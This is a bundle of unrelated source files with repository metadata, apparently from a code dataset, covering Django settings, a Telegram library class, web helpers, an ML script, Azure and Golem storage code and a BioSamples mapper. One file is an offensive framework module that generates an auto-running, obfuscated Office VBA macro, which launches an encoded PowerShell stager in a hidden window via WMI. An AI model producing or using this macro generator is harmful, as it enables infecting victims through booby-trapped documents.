'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'ja-jp'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| 25.344262 | 91 | 0.695666 |
795acee2295e2a9400d24eb157f335dabf56d1a5 | 886 | py | Python | pytglib/api/types/log_stream_file.py | iTeam-co/pytglib | e5e75e0a85f89b77762209b32a61b0a883c0ae61 | [
"MIT"
] | 6 | 2019-10-30T08:57:27.000Z | 2021-02-08T14:17:43.000Z | pytglib/api/types/log_stream_file.py | iTeam-co/python-telegram | e5e75e0a85f89b77762209b32a61b0a883c0ae61 | [
"MIT"
] | 1 | 2021-08-19T05:44:10.000Z | 2021-08-19T07:14:56.000Z | pytglib/api/types/log_stream_file.py | iTeam-co/python-telegram | e5e75e0a85f89b77762209b32a61b0a883c0ae61 | [
"MIT"
] | 5 | 2019-12-04T05:30:39.000Z | 2021-05-21T18:23:32.000Z |
from ..utils import Object
class LogStreamFile(Object):
    """
    The log is written to a file

    Attributes:
        ID (:obj:`str`): ``LogStreamFile``

    Args:
        path (:obj:`str`):
            Path to the file to where the internal TDLib log will be written
        max_file_size (:obj:`int`):
            The maximum size of the file to where the internal TDLib log is written before the file will be auto-rotated

    Returns:
        LogStream

    Raises:
        :class:`telegram.Error`
    """
    ID = "logStreamFile"

    def __init__(self, path, max_file_size, **kwargs):
        # Destination file path (str) and rotation threshold in bytes (int).
        self.path = path
        self.max_file_size = max_file_size

    @staticmethod
    def read(q: dict, *args) -> "LogStreamFile":
        # Build the object straight from the TDLib response dict.
        return LogStreamFile(q.get('path'), q.get('max_file_size'))
795acf6aa44babe8a38e41613150da8518346c2f | 1,960 | py | Python | pyjobs_web/pyjobsweb/lib/helpers.py | pyjobs/web | 183742ae571ee83d4fe4b34f1f0ce9f2204c449e | [
"MIT"
] | 8 | 2016-01-29T13:06:26.000Z | 2020-11-02T07:23:57.000Z | pyjobs_web/pyjobsweb/lib/helpers.py | pyjobs/web | 183742ae571ee83d4fe4b34f1f0ce9f2204c449e | [
"MIT"
] | 18 | 2016-02-11T08:17:13.000Z | 2022-03-02T14:53:38.000Z | pyjobs_web/pyjobsweb/lib/helpers.py | pyjobs/web | 183742ae571ee83d4fe4b34f1f0ce9f2204c449e | [
"MIT"
] | 5 | 2016-02-05T08:57:12.000Z | 2018-01-15T08:19:43.000Z | # -*- coding: utf-8 -*-
"""Template Helpers used in pyjobsweb."""
import json
import logging
from datetime import datetime
from urllib import quote_plus
from markupsafe import Markup
from slugify import slugify as base_slugify
from tg import config
log = logging.getLogger(__name__)
jours = ["Lundi", "Mardi", "Mercredi", "Jeudi", "Vendredi", "Samedi", "Dimanche"]
mois = ["Janvier", u"Février", "Mars", "Avril", "Mai", "Juin", "Juillet", u"Août", "Septembtre", "Octobre", "Novembre", u"Décembre"]
def current_year():
    """Return the current year as a four-digit string."""
    return datetime.now().strftime('%Y')
def icon(icon_name):
    """Render a Bootstrap 3 glyphicon <i> tag as markup-safe HTML."""
    return Markup('<i class="glyphicon glyphicon-%s"></i>' % icon_name)
def slugify(string):
    """Return a URL-safe slug of *string* (delegates to python-slugify)."""
    return base_slugify(string)
def to_json(data, **kwargs):
    """Serialize *data* to JSON; kwargs are passed through to json.dumps."""
    return json.dumps(data, **kwargs)
def french_day(day_number):
    """Return the French day name for a 1-based day number (1=Lundi .. 7=Dimanche)."""
    return jours[day_number-1]
def french_month(month_number):
    """Return the French month name for a 1-based month number."""
    # NOTE(review): this branch returns mois[11] ("Décembre") for
    # month_number == 1, not "Janvier". It may have been intended for
    # month_number == 0 (wrap-around to the previous December) — confirm
    # against callers before changing.
    if month_number == 1:
        return mois[11]
    return mois[month_number-1]
def head_js():
    """Return the 'site.head_js' value from the TurboGears configuration."""
    return config.get('site.head_js')
def get_job_url(job_id, job_title=None, previous=None, absolute=False):
    """Build the URL of a job-details page.

    Appends a slugified title segment when *job_title* is given, a quoted
    ``?previous=`` query when *previous* is given, and prefixes the
    configured domain when *absolute* is true.
    """
    url = "/jobs/details/%s" % job_id
    if job_title:
        url = "%s/%s" % (url, slugify(job_title))
    if previous:
        url = "%s?previous=%s" % (url, quote_plus(previous))
    if absolute:
        url = "%s%s" % (config.get('site.domain_base_url'), url)
    return url
def get_company_url(company_id, previous=None, absolute=False):
    """Build the URL of a company-details page (same options as get_job_url)."""
    url = '/societes-qui-recrutent/details/%s' % company_id
    if previous:
        url += '?previous=%s' % quote_plus(previous)
    if absolute:
        url = '%s%s' % (config.get('site.domain_base_url'), url)
    return url
try:
from webhelpers2 import date, html, number, misc, text
except SyntaxError:
log.error("WebHelpers2 helpers not available with this Python Version")
| 25.789474 | 132 | 0.686224 |
795ad0213fb25fd6f2082b99042fa5aa26070448 | 1,713 | py | Python | MLP.py | AIKICo/Steganalysis-By-Frame | c2e1a20664056eb723c694949119a26f7fb6cfbc | [
"Apache-2.0"
] | 1 | 2019-03-25T07:20:05.000Z | 2019-03-25T07:20:05.000Z | MLP.py | MohMehrnia/Steganalysis-By-Frame | c2e1a20664056eb723c694949119a26f7fb6cfbc | [
"Apache-2.0"
] | 1 | 2020-01-29T07:12:02.000Z | 2020-01-29T07:12:02.000Z | MLP.py | MohMehrnia/Steganalysis-By-Frame | c2e1a20664056eb723c694949119a26f7fb6cfbc | [
"Apache-2.0"
] | null | null | null | import csv
import numpy as np
from sklearn.neural_network import MLPClassifier
from sklearn.metrics.classification import accuracy_score
from sklearn.metrics import classification_report
from sklearn.metrics import roc_curve
import matplotlib.pyplot as plt
from sklearn.metrics import roc_auc_score
def loaddata(filename, instanceCol):
    """Load a feature CSV into (X, y) arrays.

    The first row is treated as a header and skipped. Each remaining row
    contributes its first ``instanceCol`` columns to X (float32) and its
    last column to y (int).

    Args:
        filename: path to the CSV file (comma-delimited).
        instanceCol: number of leading feature columns to keep.

    Returns:
        Tuple of (X, y) numpy arrays.
    """
    x = []
    y = []
    # Fix: open the file in a context manager so the handle is closed
    # (the original csv.reader(open(...)) leaked it).
    with open(filename, 'r') as handle:
        for row in csv.reader(handle, delimiter=','):
            x.append(row[0:instanceCol])
            y.append(row[-1])
    # Fix: np.int was removed in NumPy >= 1.24; the builtin int is the
    # exact type the alias pointed to.
    return np.array(x[1:]).astype(np.float32), np.array(y[1:]).astype(int)
def fractal_modeldata(filename):
    """Train and evaluate an MLP on one fractal-feature CSV.

    Performs a seeded 50/50 shuffle split, fits a default MLPClassifier,
    and prints the classification report, accuracy (%), and ROC AUC (%).

    Args:
        filename: path to a CSV with 27 feature columns plus a label.
    """
    print(filename)
    X, Y = loaddata(filename, 27)
    np.random.seed(13)
    # Derive the permutation from the actual dataset size instead of the
    # hard-coded 1127 rows, so differently-sized datasets work too (for a
    # 1127-row dataset the permutation is identical). Also dropped the
    # unused `scores` list.
    indices = np.random.permutation(len(X))
    test_size = int(0.5 * len(indices))
    X_train = X[indices[:-test_size]]
    Y_train = Y[indices[:-test_size]]
    X_test = X[indices[-test_size:]]
    Y_test = Y[indices[-test_size:]]

    classifier = MLPClassifier()
    classifier.fit(X_train, Y_train)
    Y_pred = classifier.predict(X_test)
    print(classification_report(Y_test, Y_pred))
    print(accuracy_score(Y_test, Y_pred) * 100)
    print(roc_auc_score(Y_test, np.asarray(Y_pred)) * 100)
if __name__ == '__main__':
    root = 'D:\\\MySourceCodes\\Projects-Python\\Steganalysis-By-Frame\\SteganalysisDatasets\\Dataset\Fractal\\'
    # Evaluate each embedding-rate variant of the steghide feature set.
    for payload in (100, 71, 42, 21, 7):
        fractal_modeldata(root + 'noisyfractal-Features-steghide-%d.csv' % payload)
| 34.959184 | 112 | 0.71979 |
795ad13df29051adecc0feb4961b4513c8ad48e2 | 969 | py | Python | azure/mgmt/network/v2016_09_01/models/route_table_paged.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 5668b5785296b314ea1321057420bcd077dba9ea | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | azure/mgmt/network/v2016_09_01/models/route_table_paged.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 5668b5785296b314ea1321057420bcd077dba9ea | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | azure/mgmt/network/v2016_09_01/models/route_table_paged.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 5668b5785296b314ea1321057420bcd077dba9ea | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.paging import Paged
class RouteTablePaged(Paged):
    """
    A paging container for iterating over a list of :class:`RouteTable <azure.mgmt.network.v2016_09_01.models.RouteTable>` objects
    """

    # msrest deserialization map: 'nextLink' drives pagination and 'value'
    # holds the current page of RouteTable items.
    _attribute_map = {
        'next_link': {'key': 'nextLink', 'type': 'str'},
        'current_page': {'key': 'value', 'type': '[RouteTable]'}
    }

    def __init__(self, *args, **kwargs):

        super(RouteTablePaged, self).__init__(*args, **kwargs)
795ad1ff11d085d82cb010b969753b94cbe06b53 | 1,007 | py | Python | fetch/api/resources/method.py | ziransun/wpt | ab8f451eb39eb198584d547f5d965ef54df2a86a | [
"BSD-3-Clause"
] | 2 | 2020-04-16T18:41:05.000Z | 2021-01-30T04:33:07.000Z | fetch/api/resources/method.py | ziransun/wpt | ab8f451eb39eb198584d547f5d965ef54df2a86a | [
"BSD-3-Clause"
] | 21 | 2021-03-31T19:48:22.000Z | 2022-03-12T00:24:53.000Z | fetch/api/resources/method.py | ziransun/wpt | ab8f451eb39eb198584d547f5d965ef54df2a86a | [
"BSD-3-Clause"
] | 1 | 2020-05-04T05:26:16.000Z | 2020-05-04T05:26:16.000Z | def main(request, response):
headers = []
if "cors" in request.GET:
headers.append(("Access-Control-Allow-Origin", "*"))
headers.append(("Access-Control-Allow-Credentials", "true"))
headers.append(("Access-Control-Allow-Methods", "GET, POST, PUT, FOO"))
headers.append(("Access-Control-Allow-Headers", "x-test, x-foo"))
headers.append(("Access-Control-Expose-Headers", "x-request-method"))
headers.append(("x-request-method", request.method))
headers.append(("x-request-content-type", request.headers.get("Content-Type", "NO")))
headers.append(("x-request-content-length", request.headers.get("Content-Length", "NO")))
headers.append(("x-request-content-encoding", request.headers.get("Content-Encoding", "NO")))
headers.append(("x-request-content-language", request.headers.get("Content-Language", "NO")))
headers.append(("x-request-content-location", request.headers.get("Content-Location", "NO")))
return headers, request.body
| 59.235294 | 97 | 0.678252 |
795ad287d7fef929a41a6b796609ec25addd0716 | 2,014 | py | Python | archiver/biosamples.py | DistPub/ingest-archiver | a88b32cab2d02b55196f01a78229f4bff8d9b927 | [
"Apache-2.0"
] | null | null | null | archiver/biosamples.py | DistPub/ingest-archiver | a88b32cab2d02b55196f01a78229f4bff8d9b927 | [
"Apache-2.0"
] | null | null | null | archiver/biosamples.py | DistPub/ingest-archiver | a88b32cab2d02b55196f01a78229f4bff8d9b927 | [
"Apache-2.0"
] | null | null | null | from copy import deepcopy
from archiver.dsp_post_process import dsp_attribute, fixed_dsp_attribute, taxon_id
from conversion.json_mapper import JsonMapper
from conversion.post_process import format_date, default_to
def _taxon(*args):
ontology_item = args[0]
if ontology_item:
genus_species = ontology_item[0]
return genus_species.get('ontology_label')
def derive_concrete_type(*args):
    """Wrap the trailing path segment of a describedBy schema URL as a DSP
    attribute (the segment names the concrete metadata type)."""
    schema_url = args[0]
    concrete_type = schema_url.rsplit('/', 1)[-1]
    return dsp_attribute(concrete_type)
# JsonMapper specification: each target field maps to
# [source path, optional post-processor, optional extra args].
spec = {
    'alias': ['biomaterial.uuid.uuid'],
    'attributes': {
        'Biomaterial Core - Biomaterial Id': ['biomaterial.content.biomaterial_core.biomaterial_id', dsp_attribute],
        'HCA Biomaterial Type': ['biomaterial.content.describedBy', derive_concrete_type],
        'HCA Biomaterial UUID': ['biomaterial.uuid.uuid', dsp_attribute],
        'Is Living': ['biomaterial.content.is_living', dsp_attribute],
        'Medical History - Smoking History': ['biomaterial.content.medical_history.smoking_history', dsp_attribute],
        'Sex': ['biomaterial.content.sex', dsp_attribute],
        'project': ['', fixed_dsp_attribute, 'Human Cell Atlas']
    },
    'description': ['biomaterial.content.biomaterial_core.biomaterial_description'],
    'releaseDate': ['project.releaseDate', format_date],
    # this is to work around this being constantly empty
    'sampleRelationships': ['biomaterial.sampleRelationships', default_to, []],
    'taxon': ['biomaterial.content.genus_species', _taxon],
    'taxonId': ['biomaterial.content.biomaterial_core.ncbi_taxon_id', taxon_id],
    'title': ['biomaterial.content.biomaterial_core.biomaterial_name']
}

# Variant for projects without a release date: fall back to the
# biomaterial's own submission date.
no_release_date_spec = deepcopy(spec)
no_release_date_spec['releaseDate'] = ['biomaterial.submissionDate', format_date]
def convert(hca_data: dict):
    """Convert an HCA data bundle into a DSP sample document.

    Picks the mapping spec based on whether the enclosing project has a
    `releaseDate`; otherwise the submission-date fallback spec is used.
    """
    project = hca_data.get('project')
    if project and project.get('releaseDate'):
        chosen_spec = spec
    else:
        chosen_spec = no_release_date_spec
    return JsonMapper(hca_data).map(chosen_spec)
| 41.102041 | 116 | 0.733863 |
795ad28ccb9bfc7d6daa95e784797f21fd2511ce | 9,052 | py | Python | stats-backend/yapapi/yapapi/storage/gftp.py | cryptobench/golem-stats-backend | 567e98873bff6282415ecbdc075c27dab75d805a | [
"MIT"
] | null | null | null | stats-backend/yapapi/yapapi/storage/gftp.py | cryptobench/golem-stats-backend | 567e98873bff6282415ecbdc075c27dab75d805a | [
"MIT"
] | 4 | 2021-03-28T16:42:41.000Z | 2022-01-01T14:48:46.000Z | stats-backend/yapapi/yapapi/storage/gftp.py | golemfactory/golem-stats-backend | 95467749a13e4496032150cf08a9a3686ef213d3 | [
"MIT"
] | null | null | null | """
Golem File Transfer Storage Provider
"""
import asyncio
import contextlib
import hashlib
import json
import os
import sys
import tempfile
import uuid
from os import PathLike
from pathlib import Path
from types import TracebackType
from typing import List, Optional, cast, Union, AsyncIterator, Iterator, Type, Dict
import jsonrpc_base # type: ignore
from async_exit_stack import AsyncExitStack # type: ignore
from typing_extensions import Protocol, Literal, TypedDict, AsyncContextManager
from yapapi.storage import StorageProvider, Destination, Source, Content
import logging
_logger = logging.getLogger(__name__)
class PubLink(TypedDict):
    """GFTP linking information."""

    file: str
    """Path of the file on the local filesystem."""

    url: str
    """GFTP URL under which the local file is exposed."""


# Result status returned by gftp commands ("ok" on success).
CommandStatus = Literal["ok", "error"]
class GftpDriver(Protocol):
    """Golem FTP service API.

    Structural (duck-typed) interface of the JSON-RPC commands accepted by a
    running `gftp server` subprocess.
    """

    async def version(self) -> str:
        """Gets driver version."""
        pass

    async def publish(self, *, files: List[str]) -> List[PubLink]:
        """Exposes local file as GFTP url.

        `files`
        :   local files to be exposed
        """
        pass

    async def close(self, *, urls: List[str]) -> CommandStatus:
        """Stops exposing GFTP urls created by [publish(files=[..])](#publish)."""
        pass

    async def receive(self, *, output_file: str) -> PubLink:
        """Creates GFTP url for receiving file.

        `output_file`
        :   local path the received data will be written to
        """
        pass

    async def upload(self, *, file: str, url: str):
        """Uploads local `file` to the given GFTP `url`."""
        pass

    async def shutdown(self) -> CommandStatus:
        """Stops GFTP service.

        After shutdown all generated urls will be unavailable.
        """
        pass
def service(debug=False) -> AsyncContextManager[GftpDriver]:
    """Create an async context manager that runs a `gftp server` subprocess."""
    return cast(AsyncContextManager[GftpDriver], __Process(_debug=debug))
class __Process(jsonrpc_base.Server):
    # JSON-RPC client wrapping a `gftp server` child process: requests are
    # written to the child's stdin and responses read line-by-line from its
    # stdout.  Used as an async context manager (see `service()`).

    def __init__(self, _debug: bool = False):
        super().__init__()
        self._debug = _debug
        # Child process handle; None until __aenter__ spawns it.
        self._proc: Optional[asyncio.subprocess.Process] = None
        # Serializes access to the child's stdin/stdout pipes.
        self._lock = asyncio.Lock()

    async def __aenter__(self) -> GftpDriver:
        # RUST_LOG=debug makes the gftp binary emit verbose logging.
        env = dict(os.environ, RUST_LOG="debug") if self._debug else None
        self._proc = await asyncio.create_subprocess_shell(
            "gftp server", stdout=asyncio.subprocess.PIPE, stdin=asyncio.subprocess.PIPE, env=env
        )
        return cast(GftpDriver, self)

    async def __aexit__(self, exc_type, exc_val, exc_tb):
        # Best effort: never let shutdown errors escape the context manager.
        with contextlib.suppress(Exception):
            await self._close()

    async def _close(self):
        """Shut the child down, escalating to kill() after a 10s grace period."""
        if self._proc is None:
            return
        p: asyncio.subprocess.Process = self._proc
        self._proc = None
        # Politely ask the service to stop via its own RPC first.
        with contextlib.suppress(Exception):
            await cast(GftpDriver, self).shutdown()
        async with self._lock:
            if p.stdin:
                # Closing stdin signals EOF to the child process.
                await p.stdin.drain()
                p.stdin.close()
                try:
                    await asyncio.wait_for(p.wait(), 10.0)
                    return
                except asyncio.TimeoutError:
                    pass
        # The child did not exit in time (or had no stdin): force-terminate.
        p.kill()
        ret_code = await p.wait()
        _logger.debug("GFTP server closed, code=%d", ret_code)

    def __log_debug(self, msg_dir: Literal["in", "out"], msg: Union[bytes, str]):
        # Mirror raw RPC traffic on stderr when debug mode is enabled.
        if self._debug:
            if isinstance(msg, bytes):
                msg = msg.decode(encoding="utf-8")
            stderr = sys.stderr
            stderr.write("\n <= " if msg_dir == "in" else "\n => ")
            stderr.write(msg)
            stderr.flush()

    async def send_message(self, message):
        """Send one JSON-RPC request and return the parsed response.

        Hook called by jsonrpc_base.Server for every RPC method invocation.
        """
        async with self._lock:
            assert self._proc is not None
            assert self._proc.stdin is not None
            assert self._proc.stdout is not None
            bytes = message.serialize() + "\n"
            self.__log_debug("out", bytes)
            self._proc.stdin.write(bytes.encode("utf-8"))
            await self._proc.stdin.drain()
            msg = await self._proc.stdout.readline()
            self.__log_debug("in", msg)
            if not msg:
                # An empty read means the child never answered, most likely
                # because the gftp binary could not be started at all.
                sys.stderr.write("Please check if gftp is installed and is in your $PATH.\n")
                sys.stderr.flush()
            msg = json.loads(msg)
            return message.parse_response(msg)
@contextlib.contextmanager
def _temp_file(temp_dir: Path) -> Iterator[Path]:
file_name = temp_dir / str(uuid.uuid4())
yield file_name
if file_name.exists():
os.remove(file_name)
class GftpSource(Source):
    """A local file published through GFTP, addressable by its public URL."""

    def __init__(self, length: int, link: PubLink):
        self._length = length
        self._pub_link = link

    @property
    def download_url(self) -> str:
        """GFTP URL from which the published file can be fetched."""
        return self._pub_link["url"]

    async def content_length(self) -> int:
        """Size of the published file in bytes."""
        return self._length
class GftpDestination(Destination):
    # Upload target backed by a GFTP "receive" URL; the received data lands in
    # the local file recorded in the link.

    def __init__(self, _proc: GftpDriver, _link: PubLink) -> None:
        self._proc = _proc
        self._link = _link

    @property
    def upload_url(self) -> str:
        """GFTP URL the provider should upload results to."""
        return self._link["url"]

    async def download_stream(self) -> Content:
        """Stream the received file's bytes in 30 kB chunks."""
        file_path = Path(self._link["file"])
        length = file_path.stat().st_size

        async def chunks() -> AsyncIterator[bytes]:
            with open(file_path, "rb") as f:
                chunk = f.read(30_000)
                while chunk:
                    yield chunk
                    chunk = f.read(30_000)

        return Content(length=length, stream=chunks())

    async def download_file(self, destination_file: PathLike):
        # Short-circuit: the data is already at the requested path, so a copy
        # would be a no-op.
        if str(destination_file) == self._link["file"]:
            return
        return await super().download_file(destination_file)
class GftpProvider(StorageProvider, AsyncContextManager[StorageProvider]):
    """Storage provider backed by a single shared `gftp server` subprocess.

    Published files are de-duplicated by SHA3-256 digest so the same content
    is only exposed once.  All acquired resources (temp dirs, temp files, the
    gftp subprocess) are tracked on one AsyncExitStack and released together
    in __aexit__.
    """

    # Directory for temporary files; created lazily if not given.
    _temp_dir: Optional[Path]
    # Cache of already-published sources keyed by content digest.
    _registered_sources: Dict[str, GftpSource]

    def __init__(self, *, tmpdir: Optional[str] = None):
        self.__exit_stack = AsyncExitStack()
        self._temp_dir = Path(tmpdir) if tmpdir else None
        self._registered_sources = dict()
        self._process = None

    async def __aenter__(self) -> StorageProvider:
        self._temp_dir = Path(self.__exit_stack.enter_context(tempfile.TemporaryDirectory()))
        process = await self.__get_process()
        # Probe the service to verify it actually responds.
        _ver = await process.version()
        # TODO check version
        assert _ver
        return self

    async def __aexit__(
        self,
        exc_type: Optional[Type[BaseException]],
        exc_value: Optional[BaseException],
        traceback: Optional[TracebackType],
    ) -> Optional[bool]:
        # Releases every resource registered on the exit stack (LIFO order).
        await self.__exit_stack.aclose()
        return None

    def __new_file(self) -> Path:
        # Allocate a fresh temp-file path, lazily creating the temp dir the
        # first time it is needed (e.g. when used without __aenter__).
        temp_dir: Path = self._temp_dir or Path(
            self.__exit_stack.enter_context(tempfile.TemporaryDirectory())
        )
        if not self._temp_dir:
            self._temp_dir = temp_dir
        return self.__exit_stack.enter_context(_temp_file(temp_dir))

    async def __get_process(self) -> GftpDriver:
        # Lazily start (and cache) the shared gftp subprocess.
        _debug = bool(os.getenv("DEBUG_GFTP"))
        process = self._process or (await self.__exit_stack.enter_async_context(service(_debug)))
        if not self._process:
            self._process = process
        return process

    async def upload_stream(self, length: int, stream: AsyncIterator[bytes]) -> Source:
        """Spool the stream to a temp file, then publish it like a local file."""
        file_name = self.__new_file()
        with open(file_name, "wb") as f:
            async for chunk in stream:
                f.write(chunk)
        return await self.upload_file(file_name)

    async def upload_file(self, path: os.PathLike) -> Source:
        """Publish a local file via GFTP, reusing a prior publication if the
        content digest matches."""
        hasher = hashlib.sha3_256()
        with open(path, "rb") as f:
            while True:
                bytes = f.read(4096)
                if not bytes:
                    break
                hasher.update(bytes)
        digest = hasher.hexdigest()
        if digest in self._registered_sources:
            _logger.debug("File %s already published, digest: %s", path, digest)
            return self._registered_sources[digest]
        _logger.debug("Publishing file %s, digest: %s", path, digest)
        process = await self.__get_process()
        links = await process.publish(files=[str(path)])
        length = Path(path).stat().st_size
        assert len(links) == 1, "invalid gftp publish response"
        source = GftpSource(length, links[0])
        self._registered_sources[digest] = source
        return source

    async def new_destination(self, destination_file: Optional[PathLike] = None) -> Destination:
        """Create a GFTP receive URL backed by `destination_file` (or a fresh
        temp file when none is given or the given path already exists)."""
        if destination_file:
            if Path(destination_file).exists():
                destination_file = None
        output_file = str(destination_file) if destination_file else str(self.__new_file())
        process = await self.__get_process()
        link = await process.receive(output_file=output_file)
        return GftpDestination(process, link)
def provider() -> AsyncContextManager[StorageProvider]:
    """Create a GFTP-backed storage provider with default settings."""
    return GftpProvider()
__all__ = ("service", "provider", "GftpDriver", "PubLink")
| 31.65035 | 97 | 0.61909 |
795ad3e84a08e5c184b7949043ae79ce9b8056b9 | 5,951 | py | Python | lib/payloads/windows/macro.py | fengjixuchui/invader | 68153dafbe25e7bb821c8545952d0cc15ae35a3e | [
"MIT"
] | 2 | 2020-02-11T03:25:49.000Z | 2020-04-05T15:02:13.000Z | lib/payloads/windows/macro.py | fengjixuchui/invader | 68153dafbe25e7bb821c8545952d0cc15ae35a3e | [
"MIT"
] | null | null | null | lib/payloads/windows/macro.py | fengjixuchui/invader | 68153dafbe25e7bb821c8545952d0cc15ae35a3e | [
"MIT"
] | 1 | 2020-04-05T15:02:13.000Z | 2020-04-05T15:02:13.000Z | from lib.common import helpers
import random, string
class payload:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Macro',
'Author': ['@enigma0x3', '@harmj0y'],
'Description': ('Generates an office macro for Invader, compatible with office 97-2003, and 2007 file types.'),
'Comments': [
'http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/'
]
}
# any options needed by the payload, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate payload for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language of the payload to generate.',
'Required' : True,
'Value' : 'powershell'
},
'payloadRetries' : {
'Description' : 'Times for the payload to retry connecting.',
'Required' : False,
'Value' : '0'
},
'OutFile' : {
'Description' : 'File to output macro to, otherwise displayed on the screen.',
'Required' : False,
'Value' : '/tmp/macro'
},
'Obfuscate' : {
'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required' : False,
'Value' : 'False'
},
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
obfuscate = self.options['Obfuscate']['Value']
obfuscateCommand = self.options['ObfuscateCommand']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
payloadRetries = self.options['payloadRetries']['Value']
obfuscateScript = False
if obfuscate.lower() == "true":
obfuscateScript = True
# generate the launcher code
launcher = self.mainMenu.payloads.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, payloadRetries=payloadRetries)
Str = ''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName))))
Method=''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName))))
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
chunks = list(helpers.chunks(launcher, 50))
payload = "\tDim "+Str+" As String\n"
payload += "\t"+Str+" = \"" + str(chunks[0]) + "\"\n"
for chunk in chunks[1:]:
payload += "\t"+Str+" = "+Str+" + \"" + str(chunk) + "\"\n"
macro = "Sub Auto_Open()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Sub AutoOpen()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Sub Document_Open()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Public Function "+Method+"() As Variant\n"
macro += payload
macro += "\tConst HIDDEN_WINDOW = 0\n"
macro += "\tstrComputer = \".\"\n"
macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
macro += "\tobjProcess.Create "+Str+", Null, objConfig, intProcessID\n"
macro += "End Function\n"
return macro
| 43.437956 | 257 | 0.513023 |
795ad4daf35ce77ee022b2fdc429018329cf70c1 | 129 | py | Python | backend/sandbox/todos/views/__init__.py | MMotionMan/django-edw | 0f686429d29e0f40409a3b2318664973b2844c08 | [
"BSD-3-Clause"
] | 4 | 2019-09-18T05:51:12.000Z | 2020-10-23T08:50:00.000Z | backend/sandbox/todos/views/__init__.py | Vvvnukova/django-edw | 18397c2e6e2d7ddebad4d83ffee16425e7ac4e9f | [
"BSD-3-Clause"
] | 10 | 2020-04-29T11:46:44.000Z | 2022-03-11T23:38:27.000Z | backend/sandbox/todos/views/__init__.py | Vvvnukova/django-edw | 18397c2e6e2d7ddebad4d83ffee16425e7ac4e9f | [
"BSD-3-Clause"
] | 13 | 2020-04-09T07:49:48.000Z | 2022-03-02T07:06:28.000Z | # -*- coding: utf-8 -*-
from django.shortcuts import render
def index(request):
    """Render the todos landing page."""
    template_name = "todos/index.html"
    return render(request, template_name)
| 18.428571 | 46 | 0.689922 |
